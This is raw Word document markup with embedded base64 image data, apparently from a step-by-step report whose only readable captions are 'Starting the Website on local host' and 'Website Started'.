JP9XHJHH/q/MoA+hP7UtP+fmH/AL+Cj+1L&#10;T/n5h/7+CvK6yfFHiODwvo8mpTxyS20ckccnl/8ALOOSSOPzP+2fmeZQB7V/alp/z8w/9/BR/alp&#10;/wA/MP8A38FfPem/FDw9rOsWWm6df/brm4k8v/Vyfu/3ckn/ALTre8P6z/b1nJP5Elt5d3cW/lyf&#10;9M7iSPzP/IdAHs39qWn/AD8w/wDfwUf2paf8/MP/AH8FeGeMten8OaPbXcEccssl/Z2X7z/nncXk&#10;dv8A+1KPAuvT+LfA/hzXZ444rnU9Mt72SOP/AFcckkfmUAe5/wBqWn/PzD/38FH9qWn/AD8w/wDf&#10;wV5NHdQS+XGkkcvmR+ZH+8/5Z1HHf2kt5LaJPH9tjjjkktvM/eRxyf6v/wBFyUAeu/2paf8APzD/&#10;AN/BR/alp/z8w/8AfwV5XRQB6p/alp/z8w/9/BR/alp/z8w/9/BXldFAHqn9qWn/AD8w/wDfwUf2&#10;paf8/MP/AH8FeV0UAeqf2paf8/MP/fwUf2paf8/MP/fwV5XRQB6p/alp/wA/MP8A38FH9qWn/PzD&#10;/wB/BXldFAHqn9qWn/PzD/38FH9qWn/PzD/38FeM63fyaXZxzpHHL5lxb2//AH8kjj/9qVS8C69P&#10;4t8D+HNanjjiudT0y3vZI4/9XHJJH5lAHuf9qWn/AD8w/wDfwUn9qWv/AD8Q/wDfwV5ZXh2pftS2&#10;Fr4g1bTYPDWpSW1hfyadJqVzcW9vZfaI/wDln5kknl1zVq8MP/EOWviqeH/iH2H/AGpa/wDPxD/3&#10;8FL/AGpaH/l5h/7+Cvln4Z/HKD4jeJJNF/4R7UtIk+wSajb3N95fl3EfmeX5kckf+s/1lep1pTqQ&#10;qQ9pA1o1oYin7SB6g2p224f6RDj/AK6Cl/tO1OQbiHH/AF0FeU3N1Ha28k88nlRxx+ZJJXBx/GnQ&#10;rrUPIgjnlj8z/j5rthQqVKftIQOHGZnhMA4LFT5Ln0r/AGpaf8/MP/fwUf2pa/8APzD/AN/BXk1t&#10;dR3VvHPBJ5scn+rqWuc9JNSV0epjVLXr9ohH/bQUHVLXr9ohP/bQV4L42+Jnhr4c2f2vxDq0Fj/z&#10;zjl/1kn/AFzjrJ+Hfxu8H/FCPy9E1aP7b/y0sbn93c/9+66PquI9n7bk9w5vrWH5/Yc/vn0j/alr&#10;/wA/MP8A38FH9qWn/PzD/wB/BXldUtb1SPRtH1HUnTzI7S3kuJI4/wDpnHUU6ftans0dR6//AGna&#10;4/4+If8Av4KRtStCB/pEJ/7aCvjjTf2tNF1SPfB4e1WSPzPL/wCWdelfDv4gwfEHT727tbSex8i4&#10;+zyR3P8ArK9nGZDmGBp+0rw5TyKObYKvX+rwn7578dStT/y8w/8AfwU06jaL0nhP/bQV5fWbq3iP&#10;TdB8v+0buO28z/V+ZXzderToU+erPkPcp051HyUz2T+0rT/n4h/7+Cl/tO0/5+Yf+/gryexuoL+3&#10;jngk822k/eRyVLRTrUq38OdwnTqUv4h6n/alp/z8w/8AfwUv9qWn/PzD/wB/BXldcfqXxf8ABGlx&#10;yef4o0rzI/3ckcd3HJJ/37rqp0KlX+HAyPoP+07Q/wDLzD/38FH9p2n/AD8w/wDfwV4l4f8AGWje&#10;KJL2PS7+O+ks/L+0Rx/8s/M/1dbVKdOdJ8lQD1Iapbf8/EP/AH8FI2pWv/PxCf8AtoK8pklji8rf&#10;JHF5n7v95XD+MvjJ4b8G+ILbRbq4kudWuP8AWW1t/wAs4/8AnpJWtDD168+SEDmxWKw+FhzV58h9&#10;I/2paf8APzD/AN/BR/alp/z8w/8AfwV5FY3SX9nbXcH72O4j8yOrNc+zsdC1V0epDUrT/n5h/wC/&#10;gpf7TtP+fmH/AL+Cvmv4ifGnQvh9cfZJ/PvtR8vzPsNtH+8jjrR8AfFDRfiNb3P9n+ZbXtv/AMfF&#10;jcx+XJHXpTyvF06H1rk9wj2kOf2Z9Cf2paf8/MP/AH8FH9qWv/PzD/38FeV1WvrqCws5J7qeO2to&#10;4/Mkkk/5Z15l7I03PW11O173EP8A38FB1S17XMP/AH8FfJsX7S3h661TyIbDUbnTvM8v+0ooP3de&#10;r2N/BqlnHd2snm21xH5kclc9HE0K7tCZ6OLy3FYH/eoch61/alrtP+kQ/wDfwU1dStD1nhH/AG0F&#10;eYVx/j/4oaL8ObeN9Unklubj/j3sY4/3klazqQpw55nNQwtfF1PYYeHPM9/bU7Y/enhP0kFO/tK0&#10;24+0RfTzBXzj4F+Mmk+N7z7AlpfaZqX/AD7X0Hl+ZXe0Ua8MRDmh0NMTgq+Dn7PEQ5JnqK6laL0u&#10;If8Av4KP7UtR/wAvMJ/7aCvKpJY4o5JHkjijj/eSSSV5zqX7Q/gSw1D7Amu2upySf6v7DcR3Ef8A&#10;6Mrso4Wvif4EOc8qtiaGGXPWmfTv9qWv/PzD/wB/BS/2paH/AJeYf+/grwzwj4ysPGVvcz6d5/l2&#10;8nlyeZHW/WdehUw9T2dQ0oVqeIp+0pnqf9qWv/PxD/38FH9qWn/PzCP+2grxLxB4t0LwlHHJretW&#10;OkR3H+r+3XEdv5n/AH8rnPD/AMbvBniP7bJBrtjbR28nl+Zc3Ecccla08JiKlP2lOBlPFUKVT2dS&#10;Z9I/2paf8/MP/fwVILmGT/lpGf8AgdeReb5sfmJXaab/AMg+2/651zHUdX9qj/56J+dH2qP/AJ6J&#10;+deH6t+1B8LtBvLm01Hxnpttc28kkdxHJJ/q5I61vhv8bvAnxeuNVg8G+JLHxDJpvl/a47GT/UeZ&#10;/q//AEXQB6xJdQR/6yZE/wCB1H/alp/z8w/9/BXG+JP+QfH/ANdK52gD1T+1LT/n5h/7+Cj+1LT/&#10;AJ+Yf+/gryuigD1T+1LT/n5h/wC/go/tS0/5+Yf+/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/g&#10;ryuigD1T+1LT/n5h/wC/go/tS0/5+Yf+/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/gryuigD1T&#10;+1LT/n5h/wC/go/tS0/5+Yf+/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/gryuigD1T+1LT/n5h&#10;/wC/go/tS0/5+Yf+/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/gryuigD1T+1LT/n5h/wC/go/t&#10;S0/5+Yf+/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/gryuigD1T+1LT/n5h/wC/go/tS0/5+Yf+&#10;/gryuigD1T+1LT/n5h/7+Cj+1LT/AJ+Yf+/gryuigD1T+1LT/n5h/wC/go/tS0/5+Yf+/gryuoaA&#10;PWv7Qsv+fmH/AL+D/Go/tlj/AM/MP/fwV5fXOf8ACwfDUWqXumvrtjFe2H/HxbSXHl+X/q5P/biP&#10;/v5QB7n9ssf+fmH/AL+Cj7ZY/wDPzD/38FeM6b4o0XVLjyLLVrG+uf8AnnbXEcklR6t4t03QdQt7&#10;C6kn+23cclxHHbW8kn7uPy45P9X/ANdI/wDv5QB7V9ssf+fmH/v4KX7XY/8APaH/AL+V4N/wsLSf&#10;+nr/AMAJP/jdWdN8ZabqmqR2EHnxXMkckkcclpJH/q/9Z/6MoA9v+2WP/PzD/wB/BR9ssf8An5h/&#10;7+CvKrq6gsbeSeeeO2to/wDWSSSeXHHVe21mwv4/Mtb+C5j8vzPMjk8z93QB679ssf8An5h/7+Cj&#10;7ZY/8/MP/fwV5FJqlhFeR2j3cEd7J+8jtvM/eSVdoA9Q+2WP/PzD/wB/BR9ssf8An5h/7+CvKv8A&#10;lp5dRyX8FrZyXbzwRW0f+skkk/d0Aetfa7H/AJ7Q/wDfyk+2WP8Az8w/9/BXkP8Aalh9otoPtcH2&#10;m4j8y3j8z/WR/wDTOr1AHqn9oWX/AD8w/wDfwf40f2paf8/MP/fwV8q/tH/tA6b+zf4Ai8V6ppN1&#10;q9tJfx2X2ay8vzPMk8z/AJ6f9c68D1D/AIKUQabZvdXvwa8dWNnCu97i6tPKjj989MUAfpNJqlpt&#10;/wCPqH/v4K8d+KPwR8CfGS406fxLax3VxYSfu5I5/Lkkj/55yf8ATOsL4X+O4Pid8PPDvi+ytJ7G&#10;31q0jvI7a4/1kfmV1dAHX27adDbxRW8sUFtGoSJLf7gUdMUV59Z/8g2w/wCvdP5UUAaVfhTGLvQf&#10;Dvi3+1PhNY6Pst4vkurfVI93+kR/89Liv3WooA/PD/gk3rtnrF78UjaeH9O0RUj0vf8A2c9xJv5u&#10;f+fiSSv0PrLtNG0vSL6a6s7C2trm+/1tzDbIkk3+/jrWpQBx/wASNU/4lf8AYVrBJfa1q3+j29tH&#10;/wAs/wDp4k/55xx0a3o2teLrO2sNRgsbGy+0W9xcSW13JcSSeXJ5nl/6uP8A5aR11H2SCOV7ryI/&#10;OlXyHm2fPs54/wDHzVigArhvjHFHL4Hkkn8jyo9T0+48uSOSTzPL1C3k8vy445JP3n+r/wBX/wAt&#10;K7migDyjRNe03WfFnhyODw1/ZEkd3JJ9pk0jULf/AJd7j935klnHH/5Ere+ENhBYeE72O1j8qP8A&#10;tvWP/TjcR13NFAHH/Fb/AJFey/7DWj/+nC3qP4Of8kf8D/8AYB0//wBJ466PVtFtNes4rS9j82NJ&#10;oLr/AIHE6TJ/4/Eh/CmeH9Js/Dug2GlWSSR2OnQpawx7+iRRbEoA8m0mw8S38fhiO10nUtI+waRb&#10;6ddySRxxyf8AHxZ+Z5cn/PPy47iqVzo/jfS/Hl7fpBqv9nSWn2KO5sfLkufMjuLz7PJJ5n+sjjjk&#10;j/8AIf8A00r3qoaAOe8AXV/deG45NR0260y58yT/AEa+uJLiT/rp+8rp6KKACiiigAooooAKKKKA&#10;CioamoAxfFv/ACCrb/r/ALP/ANKI6xfgv/yR/wAD/wDYB0//ANJ466u8sI9RURTcokkUn/fEu8VX&#10;8P6LaeHdDsNKsY/LsdOhS1hj9Eii2IKANGvnX4ZW/hn4pa14n8E67qVlpWjaV4l1S81LSZZ44H11&#10;3uZPs8nUP5cez8cR+lfRVYU/hHw5qMk11daFp1xM3+tmms0d3rhr0faezOHFYb2/Ied+CfE+kx/F&#10;K3+H+nXEOsf8IppN5HBqiPHJ/okktn9ng8z/AJ6J9z/tnXsNZNhoejaHM5sNKsrGaX928lrbIlaF&#10;a0YezgaYWjKEHCZxnxo0vUtY+FfiK00jzP7Rkg8yPy/+WnlyeZJH/wB+6+QPhn8UPCml6Ze6FraP&#10;oevR3fmR6lJbySRyR/8APP8Ad/8ALSvvKs/+ydJ+3f2t/Z1r9v8A+fn7Mnm/999a+jwmZU4YGpgZ&#10;w+M8DMslp4/Ee3f8nIVvBMXleE9J/eSfvIPM/eR+XJ+8/ef6ut+iivBjThThyQPpMPThRp+zgfOn&#10;xk1jTdB+Kn2690LR9c/0SPzLbVrCO48yP/tpUPhXxX4P8TfELQpNH8IaD4fkS4j8uKysYI5P+/kc&#10;dfSNFfYRzOk8PyPD+/ycvxHxMslqzxM5/Wfc5+f4QrA+JH7v4f8Aif8A7Blx/wCi5K36HhS8tZhL&#10;Gk0LDZLHJ/HXzOHqexq06p910PhD4c/Fvw/4V0/R7GDULm3jsc3byeR5nn30n7v7R5f/ADzt4/8A&#10;V19Hfs4+Io/FVr4u1WN3kjutWkk8yT+OvQf+ED8Lf9C9pf8A4AR1r6bpdhosEosrG3soX/5Z2qbK&#10;+yzfijLMyw84UKcozn1ueTLLqaxcK8CzXOeP9Zk0Hw3c6lBaR30lvH+7jrfvLhLG3lnffiNJHYRn&#10;Ga8t/wCGjvDf/Pjqn/fiL/45XwdbL3mEPZTjzQ907qmYU8Cr8zjM1fDfijXZfEltpuqWFrFHcWn2&#10;yOSy8z/npHXoNeWQ/tEeGpriKMWGqhpHjjU+XHx/5ErvNK8RW+rzeTDHNGNm/wDeEGsMJkcst9pN&#10;Q5P6/wAUi/7TpYv3PaOXyNevhD4keEfFHhzw/c2uo+E5IvtGtSXEGpR2Eckkkf8Azz8yP95X3fUN&#10;e/l2ZvAz+Ac4e0PFPgDpfij/AISjxHqWqRzxaTd29v8AZ/M/d+ZJXuNFFc+Oxixlf2/IOnD2Z598&#10;aPC+peMvCcem6RYQXOoyXEfl3NzcSW/2T/p4r571bRZfhrqWs6N4h0f+0vEOpP8AaIPE++STzI/+&#10;ef7z/rnXuV1+0R4etbieM2mqs0L+WD5cf/xyoX/aC8K3nk+bpmozbZPMi8yCP5P/ACJX0OXY3EYL&#10;93KmpQ9T4bNcHgMynOqqzjP0Z6H4S/5FPRd//Phb/wDoutavN9A+OWgeItXi02C11KGaT7vmRIYx&#10;+HmV1ni7xVbeDrC3uryKWYO+zbbhR/M185XpVPbcs4rnmfV4XF0VheaEnyQPJdc8fWfwe+J3ibUt&#10;W0q9uZtTe0ktb22gR4/s8f8ArLcF6t+CfES/FP4oWHizSrW6sbax0r7HqVxcQJB9vuP+2f8An93W&#10;hcftBeE9Rs/LutK1C4g/55zQRv8AzkpE/aI8LWcMQi07VIYU/wCWccMf/wAcr6qWMthf4Hv8vLz3&#10;02t8Jj9cpc+6+5nrlcX8XtBv/Efw31qw0v8A4/ZI/wB3H/z0/ef6utnwx4mt/FWlm/tYpooXfZ/p&#10;BBk/MVt18VWo/YqHoe7iqVqekZnyT8KdZkv/ABZp0Fjf31jHYWn2e40Ty5PL/wBX5cn/AEz/ANZX&#10;1Ro8ckel2+/iTy6l+wW/my3Xkx+c/wDy22fPVmvHhGeOx0MVKqn7OPJG0eX3TbDqrhcNOhWnz1Jz&#10;5uYK+a/2lIrvRvHmg66/nxadHYSW8d7bR/8AHvcfvP3n/kSP/v3X0D4k1628MaJLqt3HNLbR+Xuj&#10;tyA5/ebOprzi4/aF8L3kDRS6bqM0E330kgj/APjle9DD16r9pRijzcXilbljVdKfkrnk/wAJfirr&#10;v/CQaLps9/HrllJqf2OP/WfaPLk/5afvP+WdfWVeR6N8aPBc+rQw2Wj3lrcFfIWVbKBcJ6cSV6Rp&#10;WtRax5nkxvHs/wCehzXZjY05VZ4qnSUJyXv/AN6Rx5VOpRg6NbEOrb4bpjvElrJdeH9Rggj82SS0&#10;kjjj/wC2dfn18cPG2h+F/DOneF7rwF/wjXje0j0+SS9jt4/38f8Ay0k/d/8APSSP/wBGV9teLvjF&#10;o3g6/jtbyC/nLwefut4kHP4yVi/8NIeG/wDnw1X/AL9x/wDxyvWyrFVcBBVFSUvmZY6phMTLkq1H&#10;Gfoea/sI+KJPFHhvxXI/mfu7uP8A9F19Q1wmifGPRNet5J7e31CII+zbJCh/9qV2n2xPsfn/AD42&#10;eZtzXmZjXqYzFTruPLznpYFUKNDkpycjxn9ojwlqfiTVPB89r4Xk8VadafbI7+3j8vzPLkjjj8yP&#10;zP8Alp/8br5N+FOg6t8ZPiZ4j0nQbBNNsv3lxJ9pjkt47T95/q/9X/rK+yP+GkPDf/Phqv8A37j/&#10;APjlH/DSHhv/AJ8NV/79x/8AxyvewWY4vCYf2EKa+88HFf2fi6ntJ1H9x6dYxfZbO2jf/lnH5ddx&#10;pv8AyD7b/rnXifhL4xaN4wv5LWzgv4SkHn7riFDzz6Sf7dalx+0j4Z8O3kmkz2GqTXMD+QZI4Ywh&#10;H08yvlpUK1SVnFc59Esdh6dH2qqPk9D8mvj9p3x01r4veMrew8G+KZNCg1vUEtI7bw9JJHJH9pk+&#10;f/VfOf3nX3FfV3/BJjwX4v8ADerfFK68WeG9U8PSXg08x/2lpslpv8v7R/q/Mjr6p/4a38H/APQN&#10;1v8A8B4P/jlH/DW/g/8A6But/wDgPB/8co+p4jsg+vYf+Zfcz1nxJ/yD4/8ArpXO1zulfHbQfHd5&#10;JptjaalFcp+833USBNvphZD/AH66KsKlOVGXJI6qNaFaPNCXNAKKKKk1CiiigAoqGpqACiiigAoo&#10;ooAKKKKACioamoAKKKKACiiigAooooAKKhqagAooooAKKKKACuP1LwH/AMJRqlzd69dzyxxyf8Sy&#10;2triSP7J/wBNP3f/AC0/1n7z/tn/AM9PM7CigDN8Pxana6PbQavPHc3sf7uS5j/5eP8App/0zr5P&#10;/a++DfxS8WXVzafDi6Nla34S4nvR5kcscvmfPHHJbx+Z1jjk/ef89K+wqKAPmD9lf4f+MvBXg3wp&#10;ofi2K+vPENhqd5e3+tXSSSxz28kdxHHH9ok/ef6ySP8A7916z4/8yLxxos/2/wDsyP8AsTVLeO+k&#10;kjjjjk+0af5f7ySOSP8A5Zyf8s/+WdejUUAeayazB/q01rR5Y/Ljj8yTU7f/AOR6k0SWO68ead5G&#10;pR6v+71CTzI5I5Ps8cklv5cf7uOP/P8Ay0kr0aigDj/i9pd3rHwz8R2GnQSXN7Pb/u444/Mkkry3&#10;xJ4D8Uap9p13RIJ4r238O/Yvs1zBHb/b45JLjzLfy4/9XJ+8jkj/AOmkcdfQVFAHj+m6NrWl+LLK&#10;P+xZLm5k1P7RcatJaRyR/Y/L/dx+Z/rI5I/9XXsFQ1NQBx//AAiUf/CwL3VvIk8u/wBM+z3Fz9ok&#10;/wCen+r/AOmf/bOvPtJ8B3+g/DfwfaXXh6S+ttJkj+2aTHceZJJH9ok8v/R/9XJ5f7uT/tnXuNFA&#10;Hguk/D7XbXxB4c/cSfu5Le9kkubSOT7BHHcSSR28dx5n7v8AdyeX5flyV71RRQB8y/8ABQr4Y+KP&#10;i78BrbQvCOiz65qqa1bzm2tpI4/3aRSf89K/Mmz+EvjP4qa1qegeB/hzrEWo6U0kOqwXyWkktu/9&#10;wyfZoPLcYfjrX7oU2GxiWadoo445pf8AWybPv0AeZ/s1+F9S8G/ADwHoWtWkljqthpNvb3dtL/yz&#10;k8uvTqKKAM2z/wCQbYf9e6fyopll/wAguw/690/lRQB//9lQSwMEFAAGAAgAAAAhAKZaU9DdAAAA&#10;BQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwZvdJNpiYzalFPVUBFtBvE2TaRKa&#10;nQ3ZbZL+e0cvenkwvOG972WrybZqoN43jg3EswgUceHKhisDH/uXu0dQPiCX2DomAxfysMqvrzJM&#10;SzfyOw27UCkJYZ+igTqELtXaFzVZ9DPXEYt3dL3FIGdf6bLHUcJtq5MoWmiLDUtDjR1taipOu7M1&#10;8DriuL6Pn4ft6bi5fO3nb5/bmIy5vZnWT6ACTeHvGX7wBR1yYTq4M5detQZkSPhV8ZYPicw4GJgv&#10;kwXoPNP/6fN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xH6nc&#10;eQQAAGkRAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQBU&#10;228o3ycBAN8nAQAUAAAAAAAAAAAAAAAAAOIGAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQA&#10;BgAIAAAAIQCmWlPQ3QAAAAUBAAAPAAAAAAAAAAAAAAAAAPMuAQBkcnMvZG93bnJldi54bWxQSwEC&#10;LQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAAD9LwEAZHJzL19yZWxzL2Uyb0Rv&#10;Yy54bWwucmVsc1BLBQYAAAAABgAGAHwBAADuMAEAAAA=&#10;">
                <v:rect id="Rectangle 3549" o:spid="_x0000_s1284" style="position:absolute;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74F8C27D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3550" o:spid="_x0000_s1285" style="position:absolute;top:2026;width:766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67E09AD0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Step </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>1 :</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3551" o:spid="_x0000_s1286" style="position:absolute;left:5775;top:2026;width:30248;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4FCDD7EF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Starting the Website on local host</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3552" o:spid="_x0000_s1287" style="position:absolute;left:28550;top:202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093A378" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3553" o:spid="_x0000_s1288" style="position:absolute;left:59448;top:36137;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5AA95F0E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3563" o:spid="_x0000_s1289" type="#_x0000_t75" style="position:absolute;left:383;top:3900;width:58737;height:3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1+xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8IS9ramKUqpRRBAED4uuKN4ezesfbF5qE2v1028WFjwOM/MbZr7sTCVaalxpWcFwEIEg&#10;Tq0uOVdw/Nl8xSCcR9ZYWSYFT3KwXPQ+5pho++A9tQefiwBhl6CCwvs6kdKlBRl0A1sTBy+zjUEf&#10;ZJNL3eAjwE0lR1E0lQZLDgsF1rQuKL0e7kZBe4t37riuzuf2FF9ep0uWcf6t1Ge/W81AeOr8O/zf&#10;3moF48l0DH9vwhOQi18AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFao9fsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId90" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3564" o:spid="_x0000_s1290" style="position:absolute;left:256;top:3773;width:58991;height:33294;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MwxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gredKNGkdSNiFXp0Wqh9PbIPpOQ7NuQ3Sbx37sFocdhZr5hNtvB1KKj1pWWFcymEQji&#10;zOqScwVf1+NkDcJ5ZI21ZVJwJwfb9GW0wUTbnj+pu/hcBAi7BBUU3jeJlC4ryKCb2oY4eDfbGvRB&#10;trnULfYBbmo5j6KVNFhyWCiwoX1BWXX5NQoO/fzb/5xP1Xp2s7qJ83denK9KjV+H3RsIT4P/Dz/b&#10;H1rBYrmK4e9NeAIyfQAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB5nCMwxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E6C9C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173ECF7D" wp14:editId="5FAAA841">
                <wp:extent cx="5986882" cy="3761715"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41491" name="Group 41491"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3761715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3761715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3554" name="Rectangle 3554"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="42301C3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3555" name="Rectangle 3555"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="1422695" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5F9288B6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Website Started</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3556" name="Rectangle 3556"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1069797" y="202692"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="20A23359"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557" name="Rectangle 3557"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3612515"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3DBB9E1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3566" name="Picture 3566"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId91"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="389082"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3567" name="Shape 3567"/>
